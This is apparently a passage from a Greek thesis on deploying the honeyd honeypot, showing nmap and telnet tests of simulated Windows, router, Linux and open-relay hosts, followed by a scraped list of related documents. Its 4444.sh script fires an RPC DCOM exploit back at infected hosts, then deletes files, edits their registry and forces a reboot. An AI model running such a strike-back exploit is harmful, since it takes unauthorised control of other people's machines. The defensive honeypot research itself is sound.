δημιούργησε να δέχονται συνδέσεις από το internet, καλό είναι να το δοκιμάσουμε ώστε να σιγουρευτούμε ότι οι υπηρεσίες μας λειτουργούν και να δούμε τον τρόπο με τον οποίο καταγράφουν τις συνδέσεις. Δοκιμή του windows virtual host Ο σκοπός της δημιουργίας αυτού του virtual host είναι να προσομοιωθεί ένα τυπικό windows xp σύστημα ώστε να μελετηθεί η φύση και ο αριθμός των επιθέσεων που δέχεται. Για το λόγω αυτό είναι ανοικτές οι κύριες πόρτες που χρησιμοποιούν τα windows και δεν φιλτράρονται, ενώ τρέχουν και κάποιες υπηρεσίες. Το πείραμα έδειξε ότι είχαμε δίκιο να δώσουμε σχεδόν ολόκληρο το C-class δίκτυο μας στη δημιουργία windows virtual hosts, καθώς η πλειοψηφία των επιθέσεων και όλα τα worms

16 στοχεύουν σε windows συστήματα. Κοιτάζουμε αν ο είναι up ping PING ( ) 56(84) bytes of data. 64 bytes from : icmp_seq=1 ttl=128 time=1996 ms 64 bytes from : icmp_seq=2 ttl=128 time=981 ms 64 bytes from : icmp_seq=3 ttl=128 time=0.687 ms 64 bytes from : icmp_seq=4 ttl=128 time=0.618 ms ping statistics -- 4 packets transmitted, 4 received, 0% packet loss, time 3025ms rtt min/avg/max/mdev = 0.618/ / / ms, pipe 2 Κάνουμε ένα port scanning: markos@pluto$ sudo nmap -ss -v -v -O -p Starting nmap V ( ) Host ( ) appears to be up... good. Initiating SYN Stealth Scan against ( ) Adding open port 143/tcp Adding open port 20168/tcp Adding open port 9996/tcp Adding open port 10080/tcp Adding open port 3117/tcp Adding open port 80/tcp Adding open port 3128/tcp Adding open port 21/tcp Adding open port 4444/tcp Adding open port 25/tcp Adding open port 137/tcp Adding open port 138/tcp Adding open port 139/tcp Adding open port 5554/tcp Adding open port 1080/tcp Adding open port 22/tcp Adding open port 3127/tcp Adding open port 8967/tcp The SYN Stealth Scan took 88 seconds to scan ports. For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled

17 Interesting ports on ( ): (The ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 80/tcp open http 135/tcp open unknown 143/tcp open imap2 1080/tcp open socks 3117/tcp open unknown 3127/tcp open unknown 3128/tcp open squid-http 4444/tcp open krb /tcp open unknown 8967/tcp open unknown 9996/tcp open unknown 10080/tcp open unknown 20168/tcp open unknown Running: Windows XP Professional SP1 Nmap run completed 1 IP address (1 host up) scanned in 96 seconds Το nmap βρίσκει όλες τις υπηρεσίες και το λειτουργικό σύστημα όπως τα έχουμε ρυθμίσει! markos@pluto$ telnet Trying Connected to Escape character is ^]. HEADERS / HTTP/ windows HTTP/ Access Forbidden Server: Microsoft-IIS/5.0 Date: Wed, 12 Jan :07:56 GMT Content-Type: text/html Content-Length: 44 <body><h2>http/ Forbidden</h2></body>Connection closed by foreign host. Στην κονσόλα που παρατηρούμε το honeyd εμφανίζονται τα εξής: honeyd[387]: Connection request: tcp ( : :80) honeyd[387]: Connection established: tcp ( : :80) <-> scripts/win2k/iisemulator-0.95/iisemul8.pl

18 Στις πόρτες 1080, 3127, 3128, προσομοιώνεται το backdoor που εγκαθιστά το worm mydoom. Ένας μολυσμένος host από τον mydoom μόλις καταλάβει ότι κάποια από τις παραπάνω πόρτες είναι ανοικτές θα επιχειρήσει να συνδεθεί. Στις πόρτες 5554, 9996, 8967, 20168, 3117 ακούει ένα cmd prompt του λειτουργικού που προσομοιώνουμε (windows xp).διάφοροι ιοι μεταξύ των οποίων οι sasser, msblast και άλλοι εγκαθιστούν σαν backdoor ένα cmd shell σε αυτές τις πόρτες και επομένως ένας μολυσμένος host θα νομίσει ότι ο virtual host μας είναι κι αυτός μολυσμένος. To 4444.sh είναι ένα script γραμμένο για την αντιμετώπιση του worm msblast που εκμεταλλεύεται το rpc dcom exploit [2,3].Το καλοκαίρι του 2003 όπου και δημιουργήθηκε ο msblast, μέσα σε λίγο χρόνο κατάφερε να μολύνει εκατομμύρια υπολογιστές που έτρεχαν Microsoft Windows. Και όπως διαπιστώσαμε από το πείραμα, το worm αυτό, ύστερα από 2 χρόνια, δεν κυκλοφορεί στο internet. Anti msblast script Οι πόρτες που χρησιμοποιούν τα windows για file sharing και netbios οφείλονται για τις περισσότερες μολύνσεις και μεταδώσεις ιων. Τα διάφορα worms κάνουν scan για να διαπιστώσουν αν οι πόρτες αυτές είναι ανοικτές, οπότε και θα προσπαθήσουν να μεταδώσουν τον ιο. Με το να αφήνουμε ανοικτή μια πόρτα, χωρίς να τρέχει απαραίτητα κάποια υπηρεσία, μπορούμε με τη βοήθεια κάποιου ids ή ακόμα και ενός sniffer που καταγράφει την κίνηση, να πιάσουμε το payload ενός ιου ή exploit που επιχειρείται στην υπηρεσία η οποία φυσιολογικά τρέχει πίσω από αυτή την πόρτα. Το worm msblast αφου δει ότι η πόρτα 135 είναι ανοικτή θα επιχειρήσει να συνδεθεί με την πόρτα 4444, υποθέτωντας ότι αν ο host είναι ήδη μολυσμένος θα έχει εγκατασταθεί σε αυτή την πόρτα το backdoor. Διαφορετικά στέλνει το payload του ιου στην 135 και κατοπιν προσπαθεί να συνδεθεί με την 4444 για να διαπιστώσει αν πέτυχε το exploit. Το script που το honeyd θα τρέχει για κάθε εισερχόμενη σύνδεση στην πόρτα 4444 είναι το εξής: scripts/4444.sh # launch the exploit against the internal attacker /usr/honeyd/honeyd-1.0/scripts/dcom -d $1 -t 1 -l 4445 << EOF taskkill /f /im msblast.exe /t del /f %SystemRoot%\System32\msblast.exe echo Windows Registry Editor Version 5.00 > c:\cleanermsblast.reg

19 echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\cleanermsblast.reg echo windows auto update = REM msblast.exe >> c:\cleanermsblast.reg regedit /s c:\cleanermsblast.reg del /f c:\cleanermsblast.reg shutdown -r -f -t 0 exit EOF Το scripts/dcom είναι το exploit για το RPC DCOM. Εκμεταλλεύεται την αδυναμία αυτή στα λειτουργικά συστήματα windows 2000 και xp και μετά από επιτυχημένη εκτέλεση συνήθως ανοίγει ένα command prompt με δικαιώματα system. Στην περίπτωση που ένας μολυσμένος από το worm host επιχειρήσει σύνδεση στην 4444 στον windoze host, αυτός εκτελεί το dcom exploit και επιχειρεί να αποκτήσει πρόσβαση στο host αυτό! Αν τα καταφέρει, τερματίζει τη διεργασία του msblast, σβήνει τον ιο από το σύστημα,καθαρίζει τη registry και κάνει reboot στον υπολογιστή. Το script μπορεί να βελτιωθεί ώστε να κατεβάζει το patch για τον ιο αυτό ώστε να μην μπορεί να μολυνθεί στο μέλλον [3]. Ο ιος msblast είναι πολύ εύκολο να σβηστεί από έναν μολυσμένο υπολογιστή, καθώς αποτελείται από ένα μόνο αρχείο εκτελέσιμο και τις εγγραφές στη registry. Δυστυχώς οι πιο πρόσφατοι ιοί μολύνουν το σύστημα σε αρκετά σημεία και επίσης κυκλοφορούν σε αρκετές παραλλαγές ώστε να είναι πολύ πιο δύσκολη η αντιμετώπιση τους με έναν αυτοματοποιημένο τρόπο strike back σαν αυτόν που περιγράφεται. Δοκιμή του router Ο σκοπός της δημιουργίας αυτού του virtual host είναι να προσομοιωθεί ένας router ώστε το δίκτυο μας να είναι περισσότερο αληθοφανές. Η λειτουργία των routers είναι πολύ σημαντική για ένα δίκτυο, καθώς αναλαμβάνουν την προώθηση των πακέτων. Συχνά δεν δίνεται μεγάλη σημασία στην ασφάλεια τους, γεγονός που προκαλεί πολλά προβλήματα. Μέχρι στιγμής δεν έχει υπάρξει κάποιο worm που να απευθύνεται σε routers. Ωστόσο αυτό δεν είναι καθόλου ευσηχαστικό, τη στιγμή μάλιστα που κυκλοφορούν αρκετά γνωστά προβλήματα για τους routers των μεγαλύτερων εταιρειών -πχ cisco-και μια συντονισμένη επίθεση που θα στόχευε τους δρομολογητές θα προκαλούσε πολύ μεγάλη ζημιά, αφού πρόκειται για την ίδια την υποδομή του internet. Κοιτάζουμε αν ο είναι up:

20 ping PING ( ) 56(84) bytes of data. 64 bytes from : icmp_seq=1 ttl=64 time=0.755 ms 64 bytes from : icmp_seq=2 ttl=64 time=0.600 ms ping statistics --2 packets transmitted, 2 received, 0% packet loss, time 999ms rtt min/avg/max/mdev = 0.600/0.677/0.755/0.081 ms Αντίστοιχα το honeyd μας ενημερώνει για το ping honeyd[264]: Sending ICMP Echo Reply: > Δοκιμάζουμε ένα port scanning: markos@pluto$ sudo nmap -ss -v -v -O Starting nmap V ( ) Host ( ) appears to be up... good. Initiating SYN Stealth Scan against ( ) Adding open port 22/tcp Adding open port 23/tcp The SYN Stealth Scan took 2 seconds to scan 1601 ports. For OSScan assuming that port 22 is open and port 1 is closed and neither are firewalled Interesting ports on ( ): (The 1599 ports scanned but not shown below are in state: closed) Port State Service 22/tcp open ssh 23/tcp open telnet Remote operating system guess: Cisco IOS (11) OS Fingerprint: Tseq(Class=TD%gcd=1%SI=18%IPID=I%TS=U) T1(Resp=Y%DF=N%W=1020%ACK=S++%Flags=AS%Ops=M) T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=) T3(Resp=Y%DF=N%W=1020%ACK=S++%Flags=AS%Ops=M) T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=) T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=) T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=) T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=) PU(Resp=Y%DF=N%TOS=C0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN =134%DAT=E) TCP Sequence Prediction: Class=trivial time dependency Difficulty=24 (Easy) TCP ISN Seq. Numbers: D16BFEBC D16BFEDD D16BFF0F D16BFF52 D16BFFA6 D16BFFB6 IPID Sequence Generation: Incremental Nmap run completed 1 IP address (1 host up) scanned in 3 seconds

21 To nmap βρίσκει ότι το virtual host μας τρέχει 2 υπηρεσίες (ssh και telnet), ενώ ανιχνεύει σωστά το λειτουργικό του σύστημα! markos@pluto$ telnet Trying Connected to Escape character is ^]. SSH qwerty qwerty dfgdfgdfg dfgdfgdfg Απο την πλευρά του honeyd: honeyd[299]: Connection request: tcp ( : :22) honeyd[299]: Connection established: tcp ( : :22) <-> scripts/test.sh honeyd[299]: Connection closed: tcp ( : :22 Το scripts/test.sh είναι ένα πολύ βασικό script, το οποίο εμφανίζει ένα ssh banner και μετά κάνει echo ό,τι γράφεται. Δοκιμή του linux Ο σκοπός της δημιουργίας αυτού του virtual host είναι να προσομοιωθεί ένας τυπικός linux server ώστε να μελετηθεί η φύση και ο αριθμός των επιθέσεων που δέχεται. Κοιτάζουμε αν ο είναι up: markos@pluto$ ping PING ( ) 56(84) bytes of data. 64 bytes from : icmp_seq=1 ttl=255 time=1.00 ms 64 bytes from : icmp_seq=2 ttl=255 time=0.620 ms ping statistics --2 packets transmitted, 2 received, 0% packet loss, time 1004ms rtt min/avg/max/mdev = 0.620/0.813/1.006/0.193 ms

22 Δοκιμάζουμε ένα port scanning: sudo nmap -ss -v -v -O Starting nmap V ( ) ( ) appears to be up... good. Initiating SYN Stealth Scan against ( ) Adding open port 21/tcp Adding open port 22/tcp Adding open port 25/tcp Adding open port 80/tcp Adding open port 110/tcp Adding open port 143/tcp Adding open port 514/udp Adding open port 8080/tcp The SYN Stealth Scan took 2 seconds to scan 1601 ports. For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled Interesting ports on ( ): (The 1597 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop3 143/tcp open imap 514/udp open syslogd 8080/tcp open squid No exact OS matches for host (If you know what OS is running on it, see TCP/IP fingerprint: Sinfo(V=3.00%P=i386-redhat-linux-gnu%D=1/12%Time=41E4FE1B%O=21%C=1) Tseq(Class=RI%gcd=1%SI=6C72A6%IPID=Z%TS=100HZ) T1(Resp=Y%DF=Y%W=7FFF%ACK=S++%Flags=AS%Ops=MNNTNW) T2(Resp=N) T3(Resp=Y%DF=Y%W=7FFF%ACK=S++%Flags=AS%Ops=MNNTNW) T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=) T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=) PU(Resp=Y%DF=N%TOS=D0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULE N=134%DAT=E) Uptime days (since Wed Jan 12 12:24: ) TCP Sequence Prediction: Class=random positive increments Difficulty= (Good luck!) TCP ISN Seq. Numbers: 4ACCA8C0 4BFF655F 4D7ED126 4DCB804D 4E64DE9C 4F4AEC13 IPID Sequence Generation: All zeros Nmap run completed 1 IP address (1 host up) scanned in 19 seconds

23 Το nmap βρίσκει τις υπηρεσίες που τρέχει ο virtual host καιτο λειτουργικό σύστημα. telnet Trying Connected to Escape character is ^]. headers / http/1.0 <!DOCTYPE HTML PUBLIC -//IETF//DTD HTML 2.0//EN > <HTML><HEAD> <TITLE>501 Method Not Implemented</TITLE> </HEAD><BODY> <H1>Method Not Implemented</H1> to /index.php not supported.<p> <P>alid method in request headers / http/1.0 <HR> <ADDRESS>Apache/ Server at edunet-cas7.edu Port </ADDRESS> </BODY></HTML> Connection closed by foreign host. Το script apache.sh δημιουργεί έναν fake web server που σκοπό έχει να ξεγελάσει τους επιτιθέμενους και να νομίσουν ότι έχουν να κάνουν με τον apache, και συγκεκριμένα με την έκδοση , όπως βλέπουμε παραπάνω από την απόκριση. Η αρχική σελίδα είναι η σελίδα της default εγκατάστασης του apache σε ένα suse linux σύστημα. Η σύνδεση καταγράφεται στο messages honeyd[470]:connection request: tcp (xxx.xxx.xxx.xxx: :80) honeyd[470]:connection established: tcp (xxx.xxx.xxx.xxx: :80) <-> sh scripts/suse8.0/apache.sh και στο messages-base: --MARK--,"Wed Feb 16 13:04:01 EET 2005","apache/HTTP","xxx.xxx.xxx.xxx"," ",48277,80, "HEAD / HTTP/1.0 Στις πόρτες 21 -proftpd-, 22 -ssh-, 110 -qpop-, 143 -cyrus-imapd-,514 -syslogd-, squid proxy-τρέχουν μερικές από τις πιο χρησιμοποιούμενες υπηρεσίες, οι οποίες καταγράφουν τις συνδέσεις στο αρχείο /usr/honeyd/log/ messages-base. Δοκιμή του relay virtual host

24 Ο relay virtual host δημιουργείται αποκλειστικά σαν μια antispam παγίδα. Έχει ρυθμισμένες τις υπηρεσίες smtp.pl και proxy.pl Το πρώτο είναι προσομοίωση open mail relay και το δεύτερο open proxy. Σκοπός των υπηρεσιών αυτών είναι να καταγράψουν όλο το mail το οποίο δέχονται (το οποίο φυσικά είναι spam) ώστε να μην φτάσει αυτό στον προορισμό του αλλά και για αναλύσουμε γιατί και πώς λειτουργούν οι spammers. create relay set relay personality Sun Solaris 9 set relay default tcp action reset set relay default udp action reset add relay tcp port 25 scripts/smtp.pl -q add relay tcp port 8080 scripts/proxy.pl To spam που έρχεται αποθηκεύεται στο /usr/honeyd/log/spam

25 ΣΗΜΕΙΩΣΕΙΣ -ΠΑΡΑΠΟΜΠΕΣ [1] Buffer Overflow in iis indexing service dll, [2] Security advisory για τον msblast, [3] VBS script που καθαρίζει τον MSBlast και κατεβάζει και εγκαθιστά το patch, [4] A virtual Honeypot Framework, Niels Provos, Usenix security 2004 [5] Honeyd manual [6] Simulating networks with honeyd, Chandran, Pakala [7] Usage of Honeypots for Detection and Analysis of Unknown Security Attacks, Diploma thesis, Patrick Diebold

ΚΕΦΑΛΑΙΟ 2 ΤΟ HONEYD. Εισαγωγή

ΚΕΦΑΛΑΙΟ 2 ΤΟ HONEYD. Εισαγωγή ΚΕΦΑΛΑΙΟ 2 ΤΟ HONEYD Εισαγωγή Τα τελευταία χρόνια ο όγκος της κακόβουλης διαδικτυακής κίνησης έχει αυξηθεί εντυπωσιακά, λόγω της συνεχούς εξάπλωσης των worms, τη δραστηριότητα των script kiddies που χρησιμοποιούν

Διαβάστε περισσότερα

ΚΕΦΑΛΑΙΟ 7 ΠΟΛΕΜΩΝΤΑΣ ΤΟ SPAM

ΚΕΦΑΛΑΙΟ 7 ΠΟΛΕΜΩΝΤΑΣ ΤΟ SPAM ΚΕΦΑΛΑΙΟ 7 ΠΟΛΕΜΩΝΤΑΣ ΤΟ SPAM Λίγα λόγια για το spam Αμέτρητος είναι ο όγκος του spam email που καθημερινά γεμίζει τα mailboxes των χρηστών του internet. Το spam email είναι ίσως η μεγαλύτερη ενόχληση

Διαβάστε περισσότερα

NMAP. Tutorial and Examples. Γιώργος Καππές

NMAP. Tutorial and Examples. Γιώργος Καππές NMAP Tutorial and Examples Γιώργος Καππές 2 NMAP TUTORIAL Το nmap είναι ένα δικτυακό εργαλείο ανάλυσης δικτύων. Σχεδιάστηκε έτσι ώστε να ελέγχει μεγάλα δίκτυα, ωστόσο λειτουργεί τέλεια και για έναν host.

Διαβάστε περισσότερα

δημιουργία ενός script για την αντιμετώπιση του sasser

δημιουργία ενός script για την αντιμετώπιση του sasser ΚΕΦΑΛΑΙΟ 6 ΔΗΜΙΟΥΡΓΙΑ ΕΝΟΣ SCRIPT ΓΙΑ ΤΗΝ ΑΝΤΙΜΕΤΩΠΙΣΗ ΤΟΥ SASSER Εισαγωγή Από το 1988 και το worm που έφτιαξε ο ερευνητής Robert Morris για να δει αν η εξάπλωση ενός ιου είναι εφικτή, κανείς δεν μπορούσε

Διαβάστε περισσότερα

Κεφάλαιο 4 αποτελέσματα του πειράματος

Κεφάλαιο 4 αποτελέσματα του πειράματος ΚΕΦΑΛΑΙΟ 4 ΑΠΟΤΕΛΕΣΜΑΤΑ ΤΟΥ ΠΕΙΡΑΜΑΤΟΣ Εισαγωγή Το honeyd τέθηκε σε λειτουργία στις 24 Ιανουαρίου 2005 και σταμάτησε στις 9 Μαρτίου. Όλο αυτό το διάστημα έτρεχε συνέχεια, με εξαίρεση κάποιες ώρες που αφιερώθηκαν

Διαβάστε περισσότερα

Δίκτυα Υπολογιστών ΙΙ (Ασκήσεις Πράξης)

Δίκτυα Υπολογιστών ΙΙ (Ασκήσεις Πράξης) TEI Σερρών Τμήμα Πληροφορικής και Επικοινωνιών Δίκτυα Υπολογιστών ΙΙ (Ασκήσεις Πράξης) Ανάλυση Πρωτοκόλλων Τομέας Τηλεπικοινωνιών και Δικτύων Δρ. Αναστάσιος Πολίτης Καθηγητής Εφαρμογών anpol@teiser.gr

Διαβάστε περισσότερα

Απομακρυσμένη Πρόσβαση και Εντολές Ελέγχου και Υποστήριξης

Απομακρυσμένη Πρόσβαση και Εντολές Ελέγχου και Υποστήριξης Εργαστήριο 10 ΤΕΙ ΘΕΣΣΑΛΟΝΙΚΗΣ - ΤΜΗΜΑ ΠΛΗΡΟΦΟΡΙΚΗΣ ΜΑΘΗΜΑ: ΔΙΚΤΥΑ Η/Υ Απομακρυσμένη Πρόσβαση και Εντολές Ελέγχου και Υποστήριξης Στόχος Ο στόχος του παρόντος εργαστηρίου είναι διττός: από τη μία πλευρά

Διαβάστε περισσότερα

Κεφάλαιο 2. Πηγές δεδομένων του Honeynet

Κεφάλαιο 2. Πηγές δεδομένων του Honeynet Πηγές δεδομένων του Honeynet - Σελίδα 16 - Πηγές Δεδομένων του Honeynet Οι πηγές δεδομένων, είναι εξαρτήματα του μηχανισμού Data Capture που μας παρέχουν στοιχεία για κάθε γεγονός που διαδραματίζεται μέσα

Διαβάστε περισσότερα

Web and HTTP. Βασικά Συστατικά: Web Server Web Browser HTTP Protocol

Web and HTTP. Βασικά Συστατικά: Web Server Web Browser HTTP Protocol HTTP Protocol Web and HTTP Βασικά Συστατικά: Web Server Web Browser HTTP Protocol Web Servers (1/2) Ένα πρόγραμμα (λογισμικό) που έχει εγκατασταθεί σε ένα υπολογιστικό σύστημα (έναν ή περισσότερους υπολογιστές)

Διαβάστε περισσότερα

Εργαστήριο Δικτύων Υπολογιστών

Εργαστήριο Δικτύων Υπολογιστών Εργαστήριο Δικτύων Υπολογιστών 2 η Διάλεξη: TCP/UDP Δικτυακά πρωτόκολλα / εφαρμογές Ports Unix δικτυακές εντολές Transmission Control Protocol - TCP Πρωτόκολλο Mεταφοράς RFC 793 [Postel 1981] Xρησιμοποιεί

Διαβάστε περισσότερα

ΑΣΦΑΛΕΙΑΣ ΣΕ INTERNET HOSTS

ΑΣΦΑΛΕΙΑΣ ΣΕ INTERNET HOSTS Τμήμα Πληροφορικής και Επικοινωνιών Α.Τ.Ε.Ι. Σερρών Σέρρες Μάρτιος 2006 ΜΕΛΕΤΗ ΕΠΙΣΦΑΛΩΝ ΣΗΜΕΙΩΝ ΚΑΙ ΒΕΛΤΙΩΣΗ ΤΗΣ ΑΣΦΑΛΕΙΑΣ ΣΕ INTERNET HOSTS Βροχίδης Ηλίας ΠΤΥΧΙΑΚΗ ΕΡΓΑΣΙΑ Επιβλέπων Καθηγητής: Χουβαρδάς

Διαβάστε περισσότερα

Στρατηγικές Ασφάλειας

Στρατηγικές Ασφάλειας Στρατηγικές Ασφάλειας Ασφάλεια Πληροφοριακών Συστημάτων. Διδάσκων: Σ. Κοντογιάννης Least/(Most) Privileges Defense in Depth Συγκεντρωτική Στρατηγική Weakest Link Strategy Fail Safe Stance Fail Safe Stance

Διαβάστε περισσότερα

Διαχείριση Δικτύων Εργαστήριο (Διαφάνειες)

Διαχείριση Δικτύων Εργαστήριο (Διαφάνειες) Διαχείριση Δικτύων Εργαστήριο (Διαφάνειες) 2015 Εντολή: ping Απλή και βασική εντολή ελέγχου σύνδεσης με καποια IP διευθυνση (πχ. υπολογιστή) ping Στέλνει επαναλαμβανόμενα μηνύματα στην IP

Διαβάστε περισσότερα

Διαχείριση Δικτύων Εργαστήριο (Διαφάνειες)

Διαχείριση Δικτύων Εργαστήριο (Διαφάνειες) Διαχείριση Δικτύων Εργαστήριο (Διαφάνειες) 2016 Εντολή: ping Απλή και βασική εντολή ελέγχου σύνδεσης με κάποια IP διεύθυνση (πχ. υπολογιστή) ping Στέλνει επαναλαμβανόμενα μηνύματα στην IP

Διαβάστε περισσότερα

Ασφάλεια Υπολογιστικών Συστημάτων

Ασφάλεια Υπολογιστικών Συστημάτων Ασφάλεια Υπολογιστικών Συστημάτων Ενότητα 5: Ασφάλεια Δικτύων Νικολάου Σπύρος Τμήμα Μηχανικών Πληροφορικής ΤΕ Άδειες Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative Commons. Για

Διαβάστε περισσότερα

Εξοικείωση με τις εντολές ipconfig και ping

Εξοικείωση με τις εντολές ipconfig και ping Διαχείριση Δικτύων Τμήμα Μηχανικών Πληροφορικής ΤΕ ΤΕΙ Ηπείρου Εργαστηριακή Άσκηση Εξοικείωση με τις εντολές ipconfig και ping Σημείωση : Η άσκηση αναφέρεται σε εντολές των Windows. Υπάρχουν παρόμοιες

Διαβάστε περισσότερα

SSH. Tutorial. Γιώργος Καππές

SSH. Tutorial. Γιώργος Καππές SSH Tutorial Γιώργος Καππές SSH Tutorial Το ssh (Secure Shell) είναι ένα ασφαλές δικτυακό πρωτόκολλο το οποίο επιτρέπει τη μεταφορά δεδομένων μεταξύ δύο υπολογιστών. Το ssh όχι μόνο κρυπτογραφεί τα δεδομένα

Διαβάστε περισσότερα

Επίπεδο Μεταφοράς. (ανεβαίνουμε προς τα πάνω) Εργαστήριο Δικτύων Υπολογιστών Τμήμα Μηχανικών Η/Υ και Πληροφορικής

Επίπεδο Μεταφοράς. (ανεβαίνουμε προς τα πάνω) Εργαστήριο Δικτύων Υπολογιστών Τμήμα Μηχανικών Η/Υ και Πληροφορικής Επίπεδο Μεταφοράς (ανεβαίνουμε προς τα πάνω) Εργαστήριο Δικτύων Υπολογιστών 2014-2015 Τμήμα Μηχανικών Η/Υ και Πληροφορικής Επίπεδο Μεταφοράς(Transport layer) Επίπεδο εφαρμογής (Application layer): Συντονισμός

Διαβάστε περισσότερα

Εργαστήριο ικτύων Υπολογιστών 6η ιάλεξη: Ασφάλεια δικτύων

Εργαστήριο ικτύων Υπολογιστών 6η ιάλεξη: Ασφάλεια δικτύων Εργαστήριο ικτύων Υπολογιστών 6 η ιάλεξη: Ασφάλεια δικτύων Ασφάλεια ικτύων Μέθοδοι επίθεσης Denial-of-Service i (DoS) Μη εξουσιοδοτημένη πρόσβαση (Unauthorized access attacks) Password attacks, Trojan

Διαβάστε περισσότερα

CYTA Cloud Server Set Up Instructions

CYTA Cloud Server Set Up Instructions CYTA Cloud Server Set Up Instructions ΕΛΛΗΝΙΚΑ ENGLISH Initial Set-up Cloud Server To proceed with the initial setup of your Cloud Server first login to the Cyta CloudMarketPlace on https://cloudmarketplace.cyta.com.cy

Διαβάστε περισσότερα

Μελέτη Χαμηλής και Υψηλής Αλληλεπίδρασης Honeypots

Μελέτη Χαμηλής και Υψηλής Αλληλεπίδρασης Honeypots ΠΑΝΕΠΙΣΤΗΜΙΟ ΠΕΙΡΑΙΩΣ Τμήμα Διδακτικής της Τεχνολογίας και Ψηφιακών Συστημάτων Μελέτη Χαμηλής και Υψηλής Αλληλεπίδρασης Honeypots Πτυχιακή Εργασία Συγγραφέας: Τρούλης Σ. Ιωάννης Υπεύθυνος Καθηγητής: Δρ.

Διαβάστε περισσότερα

Επίπεδο δικτύου IP Forwading κτλ

Επίπεδο δικτύου IP Forwading κτλ Επίπεδο δικτύου IP Forwading κτλ (IP για που το έβαλες) Εργαστήριο Δικτύων Υπολογιστών 2014-2015 Τμήμα Μηχανικών Η/Υ και Πληροφορικής Επίπεδο δικτύου (Network layer) Επίπεδο εφαρμογής (Application layer):

Διαβάστε περισσότερα

Πρωτόκολλο ICMP (Internet Control Message Protocol)

Πρωτόκολλο ICMP (Internet Control Message Protocol) Εργαστήριο Δικτύων Ι Εργαστηριακές Σημειώσεις Τεχνικός Δικτύων & Τηλεπικοινωνιών Ρίγγας Δηµήτρης Δ.Ι.Ε.Κ. Κέρκυρας, 2014 Πρωτόκολλο ICMP (Internet Control Message Protocol) Τι είναι το ICMP Το πρωτόκολλο

Διαβάστε περισσότερα

Σύντομη παρουσίαση των εργαλείων/εντολών telnet, ping, traceroute nslookup και nmap, zenmap

Σύντομη παρουσίαση των εργαλείων/εντολών telnet, ping, traceroute nslookup και nmap, zenmap Σύντομη παρουσίαση των εργαλείων/εντολών telnet, ping, traceroute nslookup και nmap, zenmap Version 2.00 Επιμέλεια Σημειώσεων: Δημήτρης Κόγιας Πατρικάκης Χαράλαμπος Πίνακας περιεχομένων TELNET... 2 PING...

Διαβάστε περισσότερα

Ασφάλεια Υπολογιστών Και Δικτύων. Προσομοίωση επίθεσης σε ευπαθές σε SQL Injection σύστημα και απόκτηση κονσόλας διαχειριστή

Ασφάλεια Υπολογιστών Και Δικτύων. Προσομοίωση επίθεσης σε ευπαθές σε SQL Injection σύστημα και απόκτηση κονσόλας διαχειριστή Ασφάλεια Υπολογιστών Και Δικτύων Προσομοίωση επίθεσης σε ευπαθές σε SQL Injection σύστημα και απόκτηση κονσόλας διαχειριστή Ονοματεπώνυμο: Κυριακού Ανδρόνικος Αριθμός Μητρώου: 5806 Email: kyriakou@ceid.upatras.gr

Διαβάστε περισσότερα

Μόλις επανεκκινηθεί το inetd, η υπηρεσία θα απενεργοποιηθεί. Μπορείτε να απενεργοποιήσετε το inetd με την εντολή:

Μόλις επανεκκινηθεί το inetd, η υπηρεσία θα απενεργοποιηθεί. Μπορείτε να απενεργοποιήσετε το inetd με την εντολή: Κεφάλαιο 14 Ασφάλεια Η ασφάλεια κάθε συστήματος είναι σημαντική. Μπορεί να αποτρέψει τους άλλους απο το να χρησιμοποιήσουν τον υπολογιστή σας για να κάνουν μια επίθεση, καθώς επίσης και να προστατέψει

Διαβάστε περισσότερα

ΗY335: Δίκτυα Υπολογιστών Χειμερινό Εξάμηνο Τμήμα Επιστήμης Υπολογιστών Πανεπιστήμιο Κρήτης Διδάσκουσα: Μαρία Παπαδοπούλη

ΗY335: Δίκτυα Υπολογιστών Χειμερινό Εξάμηνο Τμήμα Επιστήμης Υπολογιστών Πανεπιστήμιο Κρήτης Διδάσκουσα: Μαρία Παπαδοπούλη ΗY335: Δίκτυα Υπολογιστών Χειμερινό Εξάμηνο 2012-2013 Τμήμα Επιστήμης Υπολογιστών Πανεπιστήμιο Κρήτης Διδάσκουσα: Μαρία Παπαδοπούλη Project 2012-2013 Υλοποίηση ενός chat server-client Παράδοση: 7/2/2013

Διαβάστε περισσότερα

ΤΕΙ ΗΠΕΙΡΟΥ Τμήμα Τηλεπληροφορικής & Διοίκησης

ΤΕΙ ΗΠΕΙΡΟΥ Τμήμα Τηλεπληροφορικής & Διοίκησης ΤΕΙ ΗΠΕΙΡΟΥ Τμήμα Τηλεπληροφορικής & Διοίκησης ΕΓΚΑΤΑΣΤΑΣΗ & ΠΑΡΑΜΕΤΡΟΠΟΙΗΣΗ INTERNET INFORMATION SERVER (IIS) ΓΙΑ ΥΛΟΠΟΙΗΣΗ ΥΠΗΡΕΣΙΩΝ ΔΙΑΔΙΚΤΥΟΥ (WEB SERVICES) ΣΠΟΥΔΑΣΤΡΙΑ:Μπάρδα Μαρία ΕΙΣΗΓΗΤΗΣ: Τσιαντής

Διαβάστε περισσότερα

Network Address Translation (NAT)

